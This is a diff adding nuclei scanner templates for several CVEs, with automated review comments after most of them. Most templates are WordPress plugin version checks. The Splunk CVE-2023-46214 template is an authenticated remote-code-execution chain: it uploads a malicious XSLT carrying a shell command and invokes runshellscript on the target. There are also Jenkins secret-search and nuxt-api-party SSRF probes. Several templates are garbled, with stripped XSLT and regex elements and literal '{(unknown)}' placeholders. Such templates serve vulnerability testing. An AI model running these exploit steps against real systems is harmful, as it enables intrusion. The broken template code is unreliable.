+ read-size: 2048
+ matchers-condition: and
+ # if oob server receives and http request
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+ - type: status
+ part: interactsh_request
+ status:
+ - 200
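Review bot: The `exploit` variable references `{{interactsh_url}}`, but the placeholder nuclei substitutes is `{{interactsh-url}}` (as the CVE-2019-1003000 and CVE-2023-33533 templates in this patch use), so no OAST hostname is ever inserted and the `interactsh_protocol` matcher can never fire. `variables` is written as a YAML sequence (`- exploit:`, `- payload:`) whereas nuclei expects a mapping, and `metadata:` sits at column 0 outside `info:`, so both will most likely be rejected or silently ignored at load time. The `payload` expression `{{51000000 + hex_encode(…) + 0000006f421e4000000000}}` combines unquoted hex fragments with `+`, which the DSL will try to evaluate as arithmetic on an invalid literal; quote the fragments as strings if concatenation is intended. Finally, a `status` matcher with `part: interactsh_request` has no status code to compare on a `tcp` template — the word matcher on `interactsh_protocol` already covers the OOB check.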
diff --git a/poc/cve/CVE-2023-43494.yaml b/poc/cve/CVE-2023-43494.yaml
new file mode 100644
index 0000000000..689b2ec50d
--- /dev/null
+++ b/poc/cve/CVE-2023-43494.yaml
@@ -0,0 +1,42 @@
+id: jenkins-cve-2023-43494
+
+info:
+ name: Jenkins CVE-2023-43494 Exploit
+ author: Saumya Agarwal
+ severity: medium
+ description: |
+ Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
+ reference:
+ - http://www.openwall.com/lists/oss-security/2023/09/20/5
+ - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cve-id: CVE-2023-43494
+ cwe-id: CWE-200
+ tags: jenkins, cve-2023-43494, exploit
+
+variables:
+ project_name: "{{project_name}}"
+ search_string: "{{search_string}}"
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}"
+
+ headers:
+ accept: "*/*"
+ accept-language: "en-US,en;q=0.9"
+ sec-fetch-mode: "cors"
+ sec-fetch-site: "same-origin"
+ referer: "{{BaseURL}}/job/{{project_name}}/"
+ referrerPolicy: "same-origin"
+
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ part: body
+ regex:
+ - "(?s)]*>.*?]*>.*?.*?"
diff --git a/poc/cve/CVE-2023-46214.yaml b/poc/cve/CVE-2023-46214.yaml
new file mode 100644
index 0000000000..c86ed915e6
--- /dev/null
+++ b/poc/cve/CVE-2023-46214.yaml
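Review bot: The body regex `(?s)]*>.*?]*>.*?.*?` has lost its tag names — it looks like `<…[^>]*>` fragments were stripped when the file was pasted — and as written it matches any body containing two `>` characters, so together with the `status: 200` matcher the template flags every reachable job page; restore the original `[^>]*>` elements or match on a marker that only appears when the search returned a hit. The `variables` block defines `project_name: "{{project_name}}"` and `search_string: "{{search_string}}"`, i.e. each variable as its own placeholder, which resolves nothing; drop the block and document that both must be passed with `-var`, or give them usable defaults. `requests:` is the legacy key (the other templates here use `http:`), `id: jenkins-cve-2023-43494` breaks the `CVE-…` id convention, and `tags: jenkins, cve-2023-43494, exploit` contains spaces that become part of the tag names unless nuclei trims them.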
@@ -0,0 +1,194 @@ +id: CVE-2023-46214 + +info: + name: Splunk Enterprise < 9.1.2 - XML Injection + author: jackhax + severity: high + description: | + In Splunk Enterprise versions below 9.0.7 and 9.1.2, Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply. This means that an attacker can upload malicious XSLT which can result in remote code execution on the Splunk Enterprise instance. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to perform remote code execution. + remediation: | + Upgrade Splunk Enterprise to either 9.0.7 or 9.1.2. Or limit the ability of search job requests to accept XSL as valid input. + reference: + - https://advisory.splunk.com/advisories/SVD-2023-1104 + - https://github.com/nathan31337/Splunk-RCE-poc + - https://nvd.nist.gov/vuln/detail/CVE-2023-46214 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-46214 + cwe-id: CWE-91 + epss-score: 0.05 + epss-percentile: 0.129 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* + metadata: + verified: true + max-request: 13 + vendor: Splunk + product: Splunk Enterprise + tags: cve2023,cve,rce,splunk,xml + +variables: + randint: "{{rand_int(1000000000,9999999999)}}" + filename: "{{rand_base(6)}}" + +http: + - raw: + - | + GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + + redirects: true + extractors: + - type: kval + name: cval + part: cookie + kval: + - "cval" + internal: true + + - raw: + - | + POST /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cval={{cval}}&username={{username}}&password={{password}}&set_has_logged_in=false + + redirects: true + extractors: + - type: kval + name: csrf_1 + part: cookie + kval: + - "splunkweb_csrf_token_8000" + internal: true + + - raw: + - | + POST 
/en-US/splunkd/__upload/indexing/preview?output_mode=json&props.NO_BINARY_CHECK=1&input.path={(unknown)}.xsl HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=8d047bf6a7fc6ed1e8a2d789c657e3af + X-Requested-With: XMLHttpRequest + X-Splunk-Form-Key: {{csrf_1}} + + --8d047bf6a7fc6ed1e8a2d789c657e3af + Content-Disposition: form-data; name="spl-file"; filename="{(unknown)}.xsl" + Content-Type: application/xslt+xml + + + + + + mkdir /opt/splunk/var/run/splunk/dispatch/{{randint}} + + + + --8d047bf6a7fc6ed1e8a2d789c657e3af-- + + extractors: + - type: json + part: body + name: text_value + json: + - '.messages[0].text' + internal: true + + - raw: + - | + POST /en-US/splunkd/__raw/servicesNS/{{username}}/search/search/jobs?output_mode=json HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + X-Splunk-Form-Key: "{{csrf_1}}" + Content-Type: application/x-www-form-urlencoded + + search=%7Csearch+test%7Chead+1 + + extractors: + - type: json + part: body + name: jsid + json: + - '.sid' + internal: true + + - raw: + - | + POST /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cval={{cval}}&username={{username}}&password={{password}}&set_has_logged_in=false + + redirects: true + extractors: + - type: kval + name: csrf_2 + part: cookie + kval: + - "splunkweb_csrf_token_8000" + internal: true + + - raw: + - | + GET /en-US/api/search/jobs/{{jsid}}/results?xsl=/opt/splunk/var/run/splunk/dispatch/{{text_value}}/{(unknown)}.xsl HTTP/1.1 + Host: {{Hostname}} + X-Splunk-Module: Splunk.Module.DispatchingModule + X-Requested-With: XMLHttpRequest + + - raw: + - | + POST /en-US/splunkd/__raw/servicesNS/{{username}}/search/search/jobs HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + X-Splunk-Form-Key: "{{csrf_2}}" + + search=|runshellscript "shell.sh" "" "" "" "" "" "" "" "{{jsid}}" + + extractors: + - type: xpath + name: sid + xpath: + - 
'//sid/text()' + internal: true + + - raw: + - | + POST /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cval={{cval}}&username={{username}}&password={{password}}&set_has_logged_in=false + + redirects: true + extractors: + - type: kval + name: csrf_3 + part: cookie + kval: + - "splunkweb_csrf_token_8000" + internal: true + + - raw: + - | + GET /en-US/splunkd/__raw/services/search/jobs/{{randint}}/search.log HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - '{{randint}}' + + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'FATAL' + - 'ERROR' + negative: true diff --git a/poc/cve/CVE-2023-49799.yaml b/poc/cve/CVE-2023-49799.yaml new file mode 100644 index 0000000000..0727f54698 --- /dev/null +++ b/poc/cve/CVE-2023-49799.yaml 
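Review bot: The upload URL, the `filename=` field and the later `xsl=` reference all use the literal `{(unknown)}.xsl` while the `filename` variable declared in `variables` is never used; whether this is a rendering artefact or a typo, the three occurrences should read `{{filename}}.xsl` so the file written in step 3 is the one referenced in step 6. The multipart body holds only `mkdir /opt/splunk/var/run/splunk/dispatch/{{randint}}` on an otherwise empty stretch, so the surrounding XSLT elements appear to have been stripped as well and the template cannot function until they are restored. `X-Splunk-Form-Key: "{{csrf_1}}"` in the jobs request is sent with literal double quotes while the upload request sends the bare token — one of the two is wrong. The flow creates a dispatch directory and runs `runshellscript` on the target and leaves both behind, so it deserves an `intrusive` tag and a `metadata` note on cleanup, and `{{username}}`/`{{password}}` are undeclared inputs that should be documented.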
@@ -0,0 +1,60 @@ +id: CVE-2023-49799 + +info: + name: nuxt-api-party - SSRF & Credentials Leak + author: chae1xx1os, eeche, persona-twotwo, soonghee2 + severity: high + description: | + nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. This vulnerability allows an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF. + impact: | + The vulnerability allows an attacker to: + - Leak sensitive API credentials by bypassing URL validation. + - Perform Server-Side Request forgery (SSRF) attacks, potentially accessing internal services or resources not intended to be exposed. + remediation: | + To remediate this vulnerability: + - Update `nuxt-api-party` to version `0.22.0` or later. + - Revert to the previous method of detecting absolute URLs by checking the origin of the URL. + - Ensure that any input used to construct URLs is properly sanitized to remove any leading or trailing whitespace that could bypass URL validation. 
+ reference: + - https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-3wfp-253j-5jxv + - https://nvd.nist.gov/vuln/detail/CVE-2023-49799 + - https://github.com/johannschopplich/nuxt-api-party/commit/72762a200fc19d997a0f84bce578c28698dc5270 + - https://fetch.spec.whatwg.org/ + - https://fetch.spec.whatwg.org/#http-whitespace-byte + - https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L31 + - https://infra.spec.whatwg.org/#byte-sequence + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-49799 + tags: cve, cve203, ssrf, credentials, leak, web, nuxt-api-party + +variables: + payload: "https://google.com" + +requests: + - method: POST + path: + - "{{BaseURL}}/api/__api_party/MyEndpoint" + - "{{BaseURL}}/api/__api_party/__proto__" + + body: | + { + "path": " {{payload}}" + } + + headers: + Content-Type: application/json + + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "Request received" + - type: word + part: header + words: + - "Content-Type: application/json" \ No newline at end of file diff --git a/poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml b/poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml new file mode 100644 index 0000000000..dbed444716 --- /dev/null +++ b/poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml 
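Review bot: Without `matchers-condition: and`, nuclei joins the three matchers with its default `or`, so any `200` reply from `/api/__api_party/…` satisfies the template regardless of body; add `matchers-condition: and` directly above `matchers:`. The probe also sends the target to `https://google.com` and then expects `Request received` in the body, which a third-party site will not return, so that matcher is dead; using `{{interactsh-url}}` as `payload` and matching `interactsh_protocol` both confirms the server-side fetch and keeps the scan from generating traffic toward an unrelated host. The leading space in `"path": " {{payload}}"` is the whole bypass and deserves a comment, e.g. `# leading space is intentional: it defeats the absolute-URL check (GHSA-3wfp-253j-5jxv)`. `tags` has `cve203` (should be `cve2023`) and spaces after commas, `requests:` is the legacy key, and `cwe-id` is missing.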
@@ -0,0 +1,59 @@
+id: CVE-2024-10000-694d94278b136ae533a9c85fde05b877
+
+info:
+ name: >
+ Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Stored Cross-Site Scripting via Ask a Question Functionality
+ author: topscoder
+ severity: low
+ description: >
+ The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the question's content parameter in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with student-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/575f103e-cfc7-4efd-a592-658a3e919671?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10000
+ metadata:
+ fofa-query: "wp-content/plugins/learning-management-system/"
+ google-query: inurl:"/wp-content/plugins/learning-management-system/"
+ shodan-query: 'vuln:CVE-2024-10000'
+ tags: cve,wordpress,wp-plugin,learning-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learning-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.3')
\ No newline at end of file
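Review bot: `severity: low` (and the trailing `low` tag) disagrees with the template's own `cvss-score: 6.4`, which falls in the CVSS v3.1 Medium band (4.0–6.9); the same mismatch appears in the CVE-2024-10181, CVE-2024-10184 and CVE-2024-10185 hunks, and in the CVE-2024-10008 hunk it is starkest — a privilege-escalation finding carrying `cvss-score: 8.8` is labelled `low`. Derive `severity` from the score (`medium` here, `high` for CVE-2024-10008) so downstream triage does not bury the findings. These six templates only read `Stable tag` from `readme.txt` and compare versions, so a hit means "an affected release is installed", not "the flaw is reachable"; a comment above `http:` such as `# version check only: confirms an affected release, not that the plugin is active or the endpoint exposed` would set expectations for whoever acts on the result.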
diff --git a/poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml b/poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml new file mode 100644 index 0000000000..ccf55ae909 --- /dev/null +++ b/poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Missing Authorization to Privilege Escalation + author: topscoder + severity: low + description: > + The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to unauthorized user profile modification due to missing authorization checks on the /wp-json/masteriyo/v1/users/$id REST API endpoint in all versions up to, and including, 1.13.3. This makes it possible for authenticated attackers, with student-level access and above, to modify the roles of arbitrary users. As a result, attackers can escalate their privileges to the Administrator and demote existing administrators to students. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c54166e-2af2-409d-8c67-9c07f2028543?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10008 + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:CVE-2024-10008' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of 
file diff --git a/poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml b/poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml new file mode 100644 index 0000000000..78a0b94339 --- /dev/null +++ b/poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10048-b98a29a036ced771c9bb009b9895710a + +info: + name: > + Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + The Post Status Notifier Lite and Premium plugins for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.11.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10048 + metadata: + fofa-query: "wp-content/plugins/post-status-notifier/" + google-query: inurl:"/wp-content/plugins/post-status-notifier/" + shodan-query: 'vuln:CVE-2024-10048' + tags: cve,wordpress,wp-plugin,post-status-notifier,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-status-notifier/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-status-notifier" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.6') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml b/poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml new file mode 100644 index 0000000000..8af931c002 --- /dev/null +++ b/poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10181-21fdb15695068521f367ac81bba91927 + +info: + name: > + Newsletters <= 4.9.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via newsletters_video Shortcode + author: topscoder + severity: low + description: > + The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10181 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-10181' + tags: cve,wordpress,wp-plugin,newsletters-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.9.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml b/poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml new file mode 100644 index 0000000000..009dfb6c78 --- /dev/null +++ b/poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35 + +info: + name: > + SW Kick Integration - Blocks and Shortcodes for Embedding Kick Streams <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-kick-embed Shortcode + author: topscoder + severity: low + description: > + The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-kick-embed shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/077a31e7-de4b-418f-ac90-5c51a690bc65?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10184 + metadata: + fofa-query: "wp-content/plugins/streamweasels-kick-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-kick-integration/" + shodan-query: 'vuln:CVE-2024-10184' + tags: cve,wordpress,wp-plugin,streamweasels-kick-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-kick-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-kick-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml b/poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml new file mode 100644 index 0000000000..933da1dad2 --- /dev/null +++ b/poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10185-8035ec074be079e96120312271a0f33c + +info: + name: > + StreamWeasels YouTube Integration <= 1.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-youtube-embed Shortcode + author: topscoder + severity: low + description: > + The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-youtube-embed shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10185 + metadata: + fofa-query: "wp-content/plugins/streamweasels-youtube-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-youtube-integration/" + shodan-query: 'vuln:CVE-2024-10185' + tags: cve,wordpress,wp-plugin,streamweasels-youtube-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-youtube-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-youtube-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2') \ No newline at end of file 
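Review bot: The `word` matcher requires the literal directory slug `streamweasels-youtube-integration` to appear inside readme.txt, but a plugin readme does not necessarily mention its own slug, so on such installs the template returns nothing even when the version is in range. A presence check that the extractor already depends on — `words: ["Stable tag:"]` — or the `=== ... ===` title line is a safer anchor. Like the sibling templates this is a version-range fingerprint rather than an attempt to trigger the sw-youtube-embed shortcode; record `verified: false` in metadata.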
diff --git a/poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml b/poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml new file mode 100644 index 0000000000..5f7009d3ef --- /dev/null +++ b/poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29 + +info: + name: > + Arconix Shortcodes <= 2.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via box Shortcode + author: topscoder + severity: low + description: > + The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10226 + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:CVE-2024-10226' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.13') \ No newline at end of file 
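Review bot: The two `version` extractors run the same regex; the second, non-`internal` one exists only so the value is shown in results, and without a comment it will be removed as a duplicate by the next cleanup — add `# non-internal copy so the matched version is printed with the result` above it. `severity: low` / tag `low` sit below the declared CVSS 6.4 (medium); align them. The check is a version fingerprint of readme.txt, not a rendering of the `box` shortcode, so `metadata` should state `verified: false`.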
diff --git a/poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml b/poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml new file mode 100644 index 0000000000..953038697d --- /dev/null +++ b/poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582 + +info: + name: > + affiliate-toolkit <= 3.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via atkp_product Shortcode + author: topscoder + severity: low + description: > + The affiliate-toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atkp_product shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f86568f-dcdd-44fb-905a-9c5474f56515?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10227 + metadata: + fofa-query: "wp-content/plugins/affiliate-toolkit-starter/" + google-query: inurl:"/wp-content/plugins/affiliate-toolkit-starter/" + shodan-query: 'vuln:CVE-2024-10227' + tags: cve,wordpress,wp-plugin,affiliate-toolkit-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/affiliate-toolkit-starter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "affiliate-toolkit-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.5') \ No newline at end of file 
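Review bot: The title names the plugin `affiliate-toolkit` but the probed path, fofa and google queries all assume the `affiliate-toolkit-starter` slug; if the vendor also ships a paid build under a different directory (not verifiable from here), those installs are never checked, and the description should name the slug actually tested. As with the other entries in this batch the template only compares the readme `Stable tag` and does not exercise the atkp_product shortcode, so mark `verified: false`. `severity: low` contradicts the CVSS 6.4 metrics three lines above it.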
